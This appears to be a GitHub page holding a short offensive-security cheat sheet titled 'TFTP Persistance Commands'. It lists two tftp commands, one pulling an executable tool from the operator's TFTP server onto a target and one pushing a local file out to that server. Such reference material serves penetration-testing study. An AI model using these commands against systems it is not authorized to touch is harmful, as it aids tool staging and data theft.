Skip to content

Latest commit

 

History

History
7 lines (6 loc) · 359 Bytes

File metadata and controls

7 lines (6 loc) · 359 Bytes

TFTP Persistance Commands

Commands

Command Description / Importance
tftp -i ip-address-of-tftp-server get toolname.exe Retrive a file from your TFTP server onto the local machine.
tftp -i ip-address-of-tftp-server put somefiletoupload.txt Send a file from the local machine to your TFTP server.